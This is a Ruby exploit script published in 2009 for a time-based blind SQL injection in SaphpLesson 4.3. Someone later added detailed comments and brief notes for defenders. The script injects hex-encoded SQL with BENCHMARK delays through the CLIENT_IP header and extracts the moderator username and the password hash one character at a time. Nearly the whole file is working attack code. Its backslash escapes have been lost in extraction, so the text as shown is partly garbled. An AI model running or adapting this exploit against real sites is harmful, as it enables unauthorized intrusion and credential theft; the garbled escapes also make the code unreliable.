
# Title : Saphplesson 4.3 Remote Blind SQL Injection Exploit
# Published : 2009-09-16
# Author : Jafer Al Zidjali


#!/usr/bin/ruby

#=============================================#
#          SaphpLesson v4.3 Exploit           #
#     Blind SQL Injection Vulnerability       #
#---------------------------------------------#
# Date: 21-08-2009                            #
# Discovered & written by: Jafer Al Zidjali   #
# Email: jafer[at]scorpionds.com              #
# Website: www.scorpionds.com                 #
#---------------------------------------------#
# Notes:                                      #
#       1. Author has been notified           #
#       2. A public patch has been released   #
#=============================================#


require "net/http"
require "base64"

# Banner lines handed to print_intro: one array element per line, with
# the heredoc's trailing newlines stripped (chomp: true).
intro = <<~BANNER.lines(chomp: true)
  +=============================================+
  +          SaphpLesson v4.3 Exploit           +
  +     Blind SQL Injection Vulnerability       +
  +  Discovered & written by: Jafer Al Zidjali  +
  +        Email: jafer[at]scorpionds.com       +
  +         Website: www.scorpionds.com         +
  +=============================================+
BANNER

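# Prints the banner one character at a time with a rotating "spinner"
# glyph (| / - \) shown after the most recently typed character.
#
# Cosmetic only. For every character: the previous spinner glyph is
# erased with a backspace, the character and the next spinner glyph are
# written, and the method pauses for `delay` seconds. At the end of each
# line the trailing spinner glyph is erased and a newline is emitted.
#
# The extracted listing had lost its backslash escapes: `"b"` here was
# `"\b"` (backspace) and the assignment `w="\"` was `w="\\"`, which left
# that string literal unterminated and the whole file unparseable. Both
# are restored, and the four-way if/elsif chain is replaced by indexing
# into a spinner table.
#
# @param text [Array<String>] banner lines, printed in order
# @param delay [Numeric] pause after each character, in seconds
#   (0.04 as in the original; pass 0 for non-interactive use)
# @return [Array<String>] `text`, the value of the outer `each`
def print_intro(text, delay: 0.04)
  spinner = ["|", "/", "-", "\\"]
  tick = 0 # spinner state carries across lines, as in the original
  text.each do |line|
    # scan(/./) rather than each_char: the original skipped newlines.
    line.scan(/./) do |glyph|
      STDOUT.flush
      # "\b" erases the previous spinner glyph before the new pair goes out.
      print "\b#{glyph}#{spinner[tick % spinner.size]}"
      tick += 1
      sleep delay
    end
    # Erase the trailing spinner glyph and terminate the line.
    puts "\b "
  end
end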

# Interactive setup: animated banner, then the target host and script
# path are read from stdin. Neither value is validated before being
# handed to Net::HTTP below; `path` is used verbatim as the request
# target. The leading "n" in each prompt was a "\n" escape that the
# listing has lost (the "xNN" and "b" runs further down are the same
# kind of loss).
print_intro intro

puts "nEnter host name (e.g. example.com):"
host=gets.chomp

puts "nEnter script path (e.g. /saphplesson/):"
path=gets.chomp


puts "nGetting average response time..."

# Baseline timing: five plain GETs of `path` (HTTP on port 80, no TLS,
# no timeout configured on Net::HTTP), each timed with wall-clock
# Time.now. The response body is read into `w` and never used; only the
# elapsed time is kept. Anything that disturbs latency (network jitter,
# cache state, server load) shifts this baseline and therefore every
# timing decision made later in the script.
avgTime=Array.new(5)

5.times do |c|
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path)
  w=resp.body
  avgTime[c]=Time.now-s
  puts avgTime[c]
end

# Mean of the five samples. `avg*3.0` is the threshold the later loops
# compare against (`s>(avg*3.0)`) to call a response "delayed". The label
# printed here is misleading: it shows that threshold (3x the mean), not
# the mean itself.
sum=0
5.times {|c| sum+=avgTime[c]}
avg=sum/5.0
puts "Average response time is: #{avg*3.0}"

puts "nTesting delayed response time..."
delTime=Array.new(5)

# Delay calibration. Each probe carries the injection in the CLIENT_IP
# request header -- per this exploit the vulnerable application copies a
# client-supplied header into a SQL statement. The header value is a run
# of hex byte escapes (written "\x27\x20..." before the listing lost its
# backslashes) spelling a SQL fragment whose only job is to burn server
# CPU for `delay` iterations (a MySQL BENCHMARK()-style loop, visible as
# x42x45x4ex43x48x4dx41x52x4b in the hex) so that truth values can be
# read off the response time. `delay` steps through 10M, 20M, ..., 50M.
#
# Defender notes: client-supplied IP headers such as CLIENT_IP are
# untrusted input and belong in a parameterized query, never in string-
# built SQL. On the detection side, "BENCHMARK(" inside a request header,
# and bursts of slow database queries attributable to a single client,
# are cheap signals for this technique.
5.times do |t|
  delay=1000000*((t+1)*10)
  header={
  "CLIENT_IP" =>  "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43x54"+
                  "x20x49x46x28x31x3dx31x2cx42x45x4ex43x48x4d"+
                  "x41x52x4bx28#{delay}x2cx63x68x61x72x28x63x68"+
                  "x61x72x28x32x29x29x29x2cx33x34x33x34x29x20x23x20"
  }
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path,header)
  w=resp.body
  s=Time.now-s
  # Only the iteration count is stored; the measured time `s` is shown
  # to the operator but not kept.
  delTime[t]=delay
  puts "["+(t+1).to_s+"] #{s}"
end

# `sel` is the 1-based index of a delTime entry, read as a raw string and
# only converted with to_i at the point of use, with no range check.
puts "nChoose a delyed response time (it should be > average response time):"
sel=gets.chomp

print "nGetting username length"
ulen=0

# Username length oracle: one request per candidate length 1..20. The
# header carries the same hex-escaped fragment shape as the calibration
# probe, now conditioned on the length of a selected username value
# being equal to z+1, and using the delay count the operator chose. The
# first candidate whose response takes longer than 3x the baseline mean
# is accepted and the loop stops.
#
# `delTime[(sel.to_i)-1]` is unchecked: a non-numeric answer or "0"
# yields index -1, which Ruby resolves to the last element, and an
# answer above 5 yields nil, which interpolates as an empty string.
20.times do |z|
  header={
  "CLIENT_IP" =>  "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43x54"+
                  "x20x49x46x28x6cx65x6ex67x74x68x28x28x73x65x6cx65x63x74"+
                  "x20x4dx6fx64x4ex61x6dx65x20x66x72x6fx6dx20x6dx6fx64x72"+
                  "x65x74x6fx72x20x77x68x65x72x65x20x4dx6fx64x49x44x3dx31"+
                  "x29x29x3d#{z+1}x2cx42x45x4ex43x48x4dx41x52x4bx28#{delTime[(sel.to_i)-1]}"+
                  "x2cx63x68x61x72x28x63x68x61x72x28x32x29x29x29x2cx33x34x33x34x29x20x23x20"
  }
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path,header)
  w=resp.body
  s=Time.now-s
  print "."
    if (s>(avg*3.0))
      ulen=z+1
      break;
    end
  # Not reached on the iteration that breaks; harmless.
  STDOUT.flush
end

# ulen stays 0 when no candidate was accepted, so the extraction loop
# below then makes no requests at all. "nn" was "\n\n".
puts "nnUsername length: "+ ulen.to_s

puts "nnUsername: "
chars="abcdefghijklmnopqrstuvwxyz0123456789"

# Username extraction, one position at a time (z is the 0-based offset),
# one request per candidate character in `chars`. The header fragment now
# tests a one-character substring at position z+1 against `c`, with the
# same timing threshold as above. Each candidate is echoed with `print c`
# and, if the response was not delayed, erased again with "b" (a lost
# "\b" backspace), so only a matched character stays on screen; the
# `break` exits the scan for that position before the erase.
#
# Behaviour to be aware of: only lowercase letters and digits are
# candidates, and a position at which nothing matches prints nothing and
# is skipped with no indication of the gap.
ulen.times do |z|
  chars.scan(/./) do |c|
    header={
    "CLIENT_IP" => "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43"+
    "x54x20x49x46x28x73x75x62x73x74x72x69x6ex67x28x28x73"+
    "x65x6cx65x63x74x20x4dx6fx64x4ex61x6dx65x20x66x72x6f"+
    "x6dx20x6dx6fx64x72x65x74x6fx72x20x77x68x65x72x65x20"+
    "x4dx6fx64x49x44x3dx31x29x2c#{z+1}x2cx31x29x3dx27#{c}x27"+
    "x2cx42x45x4ex43x48x4dx41x52x4bx28#{delTime[(sel.to_i)-1]}"+
    "x2cx63x68x61x72x28x63x68x61x72x28x32x29x29x29x2cx33"+
    "x34x33x34x29x20x23x20"
    }
    s=Time.now
    http = Net::HTTP.new(host, 80)
    resp= http.get(path,header)
    w=resp.body
    s=Time.now-s
    print c
      if (s>(avg*3.0))
        break;
      end
    print "b"
    STDOUT.flush
  end
end

puts "nnPassword hash: "
chars="0123456789abcdef"

# Password-hash extraction, same shape as the username loop: 32 fixed
# positions, hex digits as the only candidates, one request per
# (position, digit) pair, a matched digit left on screen and every other
# candidate erased with "b" (a lost "\b"). The script assumes the stored
# value is exactly 32 hex characters; that is the shape of an MD5-style
# digest, though nothing here checks what the value actually is.
#
# Defender note: a fast, unsalted digest that can be read out this way is
# then subject to offline guessing; storing passwords with a salted,
# deliberately slow password-hashing function limits the damage of a
# disclosure like this one, and the injection itself is closed by
# parameterized queries on every client-supplied value, headers included.
32.times do |z|
  chars.scan(/./) do |c|
    header={
    "CLIENT_IP" => "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43x54"+
    "x20x49x46x28x73x75x62x73x74x72x69x6ex67x28x28x73x65x6c"+
    "x65x63x74x20x4dx6fx64x50x61x73x73x77x6fx72x64x20x66x72"+
    "x6fx6dx20x6dx6fx64x72x65x74x6fx72x20x77x68x65x72x65x20"+
    "x4dx6fx64x49x44x3dx31x29x2c#{z+1}x2cx31x29x3dx27#{c}x27x2c"+
    "x42x45x4ex43x48x4dx41x52x4bx28#{delTime[(sel.to_i)-1]}"+
    "x2cx63x68x61x72x28x63x68x61x72x28x32x29x29x29x2cx33x34"+
    "x33x34x29x20x23x20"
    }
    s=Time.now
    http = Net::HTTP.new(host, 80)
    resp= http.get(path,header)
    w=resp.body
    s=Time.now-s
    print c
      if (s>(avg*3.0))
        break;
      end
    print "b"
    STDOUT.flush
  end
end
